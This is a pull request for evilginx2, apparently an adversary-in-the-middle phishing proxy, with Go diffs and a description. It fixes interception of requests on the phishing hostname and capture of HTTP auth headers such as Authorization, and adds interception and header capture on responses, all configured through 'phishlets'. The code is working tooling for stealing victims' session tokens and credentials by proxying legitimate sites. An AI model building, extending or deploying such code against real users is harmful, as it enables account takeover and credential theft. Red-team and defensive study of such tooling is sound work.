### PR TITLE
request / response interception with request / response header capture (new `direction` attribute in `intercept` and `auth_tokens:http`)

### DIFF
--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -1024,7 +1024,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					for k, v := range pl.httpAuthTokens {
 						if _, ok := s.HttpTokens[k]; !ok {
 							if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) {
-								hv := resp.Header.Get(v.header)
+								hv := resp.Request.Header.Get(v.header)
 								if hv != "" {
 									s.HttpTokens[k] = hv
 								}

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -852,7 +852,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 
 				// check if request should be intercepted
 				if pl != nil {
-					if r_host, ok := p.replaceHostWithOriginal(req.Host); ok {
+					if r_host, ok := p.replaceHostWithOriginal(o_host); ok {
 						for _, ic := range pl.intercept {
 							//log.Debug("ic.domain:%s r_host:%s", ic.domain, r_host)
 							//log.Debug("ic.path:%s path:%s", ic.path, req.URL.Path)
@@ -1023,9 +1023,11 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					// capture http header tokens
 					for k, v := range pl.httpAuthTokens {
 						if _, ok := s.HttpTokens[k]; !ok {
-							hv := resp.Request.Header.Get(v.header)
-							if hv != "" {
-								s.HttpTokens[k] = hv
+							if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) {
+								hv := resp.Header.Get(v.header)
+								if hv != "" {
+									s.HttpTokens[k] = hv
+								}
 							}
 						}
 					}

--- a/core/http_proxy.go
+++ b/core/http_proxy.go
@@ -856,7 +856,7 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 						for _, ic := range pl.intercept {
 							//log.Debug("ic.domain:%s r_host:%s", ic.domain, r_host)
 							//log.Debug("ic.path:%s path:%s", ic.path, req.URL.Path)
-							if ic.domain == r_host && ic.path.MatchString(req.URL.Path) {
+							if ic.domain == r_host && ic.path.MatchString(req.URL.Path) && ic.direction == "request" {
 								return p.interceptRequest(req, ic.http_status, ic.body, ic.mime)
 							}
 						}
@@ -1024,7 +1024,12 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 					for k, v := range pl.httpAuthTokens {
 						if _, ok := s.HttpTokens[k]; !ok {
 							if req_hostname == v.domain && v.path.MatchString(resp.Request.URL.Path) {
-								hv := resp.Request.Header.Get(v.header)
+								hv := ""
+								if (v.direction == "request") {
+									hv = resp.Request.Header.Get(v.header)
+								} else if (v.direction == "response") {
+									hv = resp.Header.Get(v.header)
+								}
 								if hv != "" {
 									s.HttpTokens[k] = hv
 								}
@@ -1220,6 +1225,17 @@ func NewHttpProxy(hostname string, port int, cfg *Config, crt_db *CertDb, db *da
 				}
 			}
 
+			// check if response should be intercepted
+			if pl != nil {
+				for _, ic := range pl.intercept {
+					//log.Debug("ic.domain:%s r_host:%s", ic.domain, r_host)
+					//log.Debug("ic.path:%s path:%s", ic.path, req.URL.Path)
+					if ic.domain == resp.Request.Host && ic.path.MatchString(resp.Request.URL.Path) && ic.direction == "response" {
+						return p.interceptResponse(resp.Request, ic.http_status, ic.body, ic.mime)
+					}
+				}
+			}
+
 			if stringExists(mime, []string{"text/html", "application/javascript", "text/javascript", "application/json"}) {
 				resp.Header.Set("Cache-Control", "no-cache, no-store")
 			}
@@ -1297,6 +1313,11 @@ func (p *HttpProxy) trackerImage(req *http.Request) (*http.Request, *http.Respon
 		return req, resp
 	}
 	return req, nil
+}
+
+func (p *HttpProxy) interceptResponse(req *http.Request, http_status int, body string, mime string) (*http.Response) {
+	_, resp := p.interceptRequest(req, http_status, body, mime)
+	return resp
 }
 
 func (p *HttpProxy) interceptRequest(req *http.Request, http_status int, body string, mime string) (*http.Request, *http.Response) {

--- a/core/phishlet.go
+++ b/core/phishlet.go
@@ -48,10 +48,11 @@ type BodyAuthToken struct {
 }
 
 type HttpAuthToken struct {
-	domain string
-	path   *regexp.Regexp
-	name   string
-	header string
+	domain 		string
+	path   		*regexp.Regexp
+	name   		string
+	header 		string
+	direction   string
 }
 
 type PhishletVersion struct {
@@ -103,6 +104,7 @@ type Intercept struct {
 	http_status int            `mapstructure:"http_status"`
 	body        string         `mapstructure:"body"`
 	mime        string         `mapstructure:"mime"`
+	direction	string		   `mapstructure:"direction"`
 }
 
 type Phishlet struct {
@@ -160,13 +162,14 @@ type ConfigSubFilter struct {
 }
 
 type ConfigAuthToken struct {
-	Domain *string   `mapstructure:"domain"`
-	Keys   *[]string `mapstructure:"keys"`
-	Type   *string   `mapstructure:"type"`
-	Path   *string   `mapstructure:"path"`
-	Name   *string   `mapstructure:"name"`
-	Search *string   `mapstructure:"search"`
-	Header *string   `mapstructure:"header"`
+	Domain 		*string   `mapstructure:"domain"`
+	Keys   		*[]string `mapstructure:"keys"`
+	Type   		*string   `mapstructure:"type"`
+	Direction	*string   `mapstructure:"direction"`
+	Path   		*string   `mapstructure:"path"`
+	Name   		*string   `mapstructure:"name"`
+	Search 		*string   `mapstructure:"search"`
+	Header 		*string   `mapstructure:"header"`
 }
 
 type ConfigPostField struct {
@@ -216,6 +219,7 @@ type ConfigIntercept struct {
 	HttpStatus *int    `mapstructure:"http_status"`
 	Body       *string `mapstructure:"body"`
 	Mime       *string `mapstructure:"mime"`
+	Direction  *string `mapstructure:"direction"`
 }
 
 type ConfigPhishlet struct {
@@ -512,7 +516,11 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 			if ic.Mime != nil {
 				mime = *ic.Mime
 			}
-			err = p.addIntercept(*ic.Domain, path_re, *ic.HttpStatus, body, mime)
+			direction:="request"
+			if ic.Direction != nil {
+				direction = *ic.Direction
+			}
+			err = p.addIntercept(p.paramVal(*ic.Domain), path_re, *ic.HttpStatus, p.paramVal(body), mime, direction)
 			if err != nil {
 				return err
 			}
@@ -573,8 +581,12 @@ func (p *Phishlet) LoadFromFile(site string, path string, customParams *map[stri
 			if at.Header == nil {
 				return fmt.Errorf("auth_tokens: 'header' not found for http auth token")
 			}
-
-			err := p.addHttpAuthToken(p.paramVal(*at.Domain), p.paramVal(*at.Path), p.paramVal(*at.Name), p.paramVal(*at.Header))
+			
+			direction:="request"
+			if at.Direction != nil {
+				direction = *at.Direction
+			}
+			err := p.addHttpAuthToken(p.paramVal(*at.Domain), p.paramVal(*at.Path), p.paramVal(*at.Name), p.paramVal(*at.Header), direction)
 			if err != nil {
 				return err
 			}
@@ -966,17 +978,18 @@ func (p *Phishlet) addBodyAuthToken(hostname string, path string, name string, s
 	return nil
 }
 
-func (p *Phishlet) addHttpAuthToken(hostname string, path string, name string, header string) error {
+func (p *Phishlet) addHttpAuthToken(hostname string, path string, name string, header string, direction string) error {
 	path_re, err := regexp.Compile(path)
 	if err != nil {
 		return err
 	}
 
 	p.httpAuthTokens[name] = &HttpAuthToken{
-		domain: hostname,
-		path:   path_re,
-		name:   name,
-		header: header,
+		domain: 	hostname,
+		path:   	path_re,
+		name:   	name,
+		header: 	header,
+		direction: 	direction,
 	}
 
 	return nil
@@ -1006,13 +1019,14 @@ func (p *Phishlet) addJsInject(trigger_domains []string, trigger_paths []string,
 	return nil
 }
 
-func (p *Phishlet) addIntercept(domain string, path *regexp.Regexp, http_status int, body string, mime string) error {
+func (p *Phishlet) addIntercept(domain string, path *regexp.Regexp, http_status int, body string, mime string, direction string) error {
 	ic := Intercept{
 		domain:      strings.ToLower(domain),
 		path:        path,
 		http_status: http_status,
 		body:        body,
 		mime:        mime,
+		direction:	 direction,
 	}
 	p.intercept = append(p.intercept, ic)
 	return nil


### PR DESCRIPTION
**Update** (23/08/25): the PR adds
- [fix] request interception
- [fix] request header capture
- [feature] response interception
- [feature] response header capture

---

Hello there,

This PR contains two quick fixes regarding request interception and HTTP token capture.

**Request interception:**

Likely a regression introduced by https://github.com/kgretzky/evilginx2/commit/e3bef9433c3cc95d3e523533e498c834506739f0, as the value of `req.Host` does not contain the phishing hostname anymore at the new location but holds the legitimate one. As a result, the comparison fails and the request is not intercepted.

**HTTP token capture:**

The header is indeed captured in the request (e,g,. `Authorization` header). I just added the check on the domain and path specified in the phishlet (`v.domain` and `v.path`).